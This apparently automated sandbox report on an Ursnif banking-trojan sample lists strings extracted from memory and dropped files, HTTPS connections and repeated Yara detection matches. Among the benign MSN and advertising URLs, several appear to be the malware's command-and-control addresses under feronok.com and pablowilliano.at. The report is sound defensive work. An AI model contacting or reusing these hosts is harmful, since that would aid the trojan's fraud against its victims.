Source: {E30F6C06-C49D-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://authd.feronok.com/hmMzQKK9IpZemMI/AV6w9eELu1YSVPBd2B/U2fmYepaP/iI8O34L03l282SsJYJjt/THEo6G77t
Source: {1E26C961-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://authd.feronok.com/tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.6.dr	String found in binary or memory: http://popup.taboola.com/german
Source: regsvr32.exe, 00000002.00000002.1094015467.0000000000BCA000.00000004.00000020.sdmp	String found in binary or memory: http://raw.pablowilliano.at/
Source: {1081BFD7-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://raw.pablowilliano.at/5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgU
Source: {09BC39C1-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://raw.pablowilliano.at/5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6
Source: {F0E7C154-C49D-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://raw.pablowilliano.at/OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9
Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	String found in binary or memory: http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2F
Source: {24DDE3A9-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF2574ADFCE17069FC.TMP.4.dr	String found in binary or memory: http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2FnvdcE
Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	String found in binary or memory: http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0
Source: ~DF502FB81A68309E09.TMP.4.dr, {24DDE3A7-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0A2/CN
Source: {09BC39C3-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DFDAF305825D1F4F98.TMP.4.dr	String found in binary or memory: http://raw.pablowilliano.at/eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1U
Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	String found in binary or memory: http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2
Source: ~DF9E90F1D74363A308.TMP.4.dr, {2BB8F01A-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey
Source: regsvr32.exe, 00000002.00000003.1070284695.0000000000C4F000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.1094093257.0000000000C21000.00000004.00000020.sdmp	String found in binary or memory: http://raw.pablowilliano.at/sX4dtwL7bay/rzZGwpnfzczFz3/LsBuX9huxqt_2FdLEMzat/b0BQWHIzHX0afe_2/FzCUWE
Source: ~DFF80766C3FDE4D880.TMP.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.4.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.4.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.4.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.4.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.4.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.4.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.4.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.4.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.6.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: auction[1].htm.6.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=RCMAt1gGIS8WXc8APYp_ZOqKWxDwbRM5FCccwzTTz.S14TSo
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.6.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692
Source: ~DFF80766C3FDE4D880.TMP.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DFF80766C3FDE4D880.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DFF80766C3FDE4D880.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[1].htm.6.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.6.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=5wPrxQkGIS9N4yUlZ7JcFIwprOH8Ei2wBvqqRYyFUYST
Source: regsvr32.exe, 00000002.00000003.1070284695.0000000000C4F000.00000004.00000001.sdmp	String found in binary or memory: https://lo.pablowilliano.at/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1622746721&rver
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1622746721&rver=7.0.6730.0&am
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1622746722&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1622746721&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[1].htm.6.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: ~DFF80766C3FDE4D880.TMP.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: auction[1].htm.6.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/V2crpAJeakj_9YEn1xys_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[1].htm.6.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=9ecc1772ef804391b1937a727e8fcb51&r=infopane&i=1&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKFMgy.img?h=368&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXITZ.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFF80766C3FDE4D880.TMP.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorpla
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verk
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/trotz-breiter-protestwelle-sollen-die-maag-hallen-
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/unfall-mit-f%c3%bcnf-autos-beim-brunaupark-26-j%c3
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverb
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/berufung-zum-professor-ohne-doktortitel/ar-AAKEMiw?ocid=hplocal
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/der-singende-snowboader/ar-AAKFmIQ?ocid=hplocalnews
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAK
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/junger-mann-stirbt-nach-sturz-von-einer-mauer-bei-der-eth/ar-AA
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.785832858.0000000000410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.789858287.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.784546208.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6d4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.ad8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.418cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.968cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ab8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6d4a0000.6.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.948292780.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948361474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924061110.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948383297.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924111198.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021984816.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948140417.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021661815.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948411963.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924023449.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834584319.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021969620.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948218371.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923759658.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1069724529.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834728970.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948264474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021951611.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021715602.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1097599278.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923586250.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923924528.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834525873.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021915260.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834645544.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834791862.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834491785.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923995924.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948327739.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834773952.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834682087.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924095906.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021871881.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021806353.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4240, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6044, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.1094063513.0000000000D1B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.785832858.0000000000410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.789858287.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.784546208.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6d4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.ad8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.418cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.968cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ab8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6d4a0000.6.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.948292780.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948361474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924061110.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948383297.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924111198.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
